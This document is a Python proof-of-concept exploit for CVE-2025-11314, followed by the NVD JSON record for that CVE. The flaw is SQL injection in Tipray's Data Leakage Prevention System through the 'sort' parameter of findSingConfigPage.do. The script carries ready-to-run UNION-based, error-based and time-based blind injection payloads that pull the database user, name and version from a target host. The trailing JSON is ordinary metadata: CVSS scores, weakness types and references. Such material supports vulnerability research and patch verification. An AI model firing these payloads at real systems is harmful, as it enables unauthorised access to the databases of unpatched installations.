CVE-2025-11314

# CVE-2025-11314 - Tipray Data Leakage Prevention System SQL Injection PoC # Vulnerability: SQL Injection in findRolePage function via 'sort' parameter # Affected: findSingConfigPage.do endpoint import requests TARGET_URL = "http://target-host:port" VULNERABLE_ENDPOINT = "/findSingConfigPage.do" def exploit_sqli_union(base_url): """Exploit SQL injection using UNION-based technique""" # Craft malicious sort parameter for UNION-based injection payload = { "sort": "1 UNION SELECT NULL,user(),database(),version(),NULL,NULL-- -", "page": "1", "rows": "10" } try: response = requests.post( f"{base_url}{VULNERABLE_ENDPOINT}", data=payload, timeout=10 ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return response.text except Exception as e: print(f"[-] Error: {e}") return None def exploit_sqli_error_based(base_url): """Exploit SQL injection using error-based technique""" payload = { "sort": "1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT user()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -", "page": "1", "rows": "10" } try: response = requests.post( f"{base_url}{VULNERABLE_ENDPOINT}", data=payload, timeout=10 ) print(f"[+] Error-based Response: {response.text[:500]}") return response.text except Exception as e: print(f"[-] Error: {e}") return None def exploit_sqli_blind_time(base_url): """Exploit SQL injection using time-based blind technique""" payload = { "sort": "1 AND IF(1=1,SLEEP(5),0)-- -", "page": "1", "rows": "10" } try: response = requests.post( f"{base_url}{VULNERABLE_ENDPOINT}", data=payload, timeout=15 ) elapsed = response.elapsed.total_seconds() if elapsed >= 5: print(f"[+] Time-based SQLi confirmed! Response time: {elapsed}s") return elapsed except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("[*] CVE-2025-11314 Exploit PoC") print(f"[*] Target: {TARGET_URL}") print("\n[1] UNION-based injection:") exploit_sqli_union(TARGET_URL) print("\n[2] Error-based injection:") exploit_sqli_error_based(TARGET_URL) print("\n[3] Time-based blind injection:") exploit_sqli_blind_time(TARGET_URL)

{"cve": {"id": "CVE-2025-11314", "sourceIdentifier": "[email protected]", "published": "2025-10-06T02:15:39.707", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected is the function findRolePage of the file findSingConfigPage.do. Such manipulation of the argument sort leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "25FED908-237A-432E-9605-57E982321BD3"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-6.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327195", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327195", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.663480", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}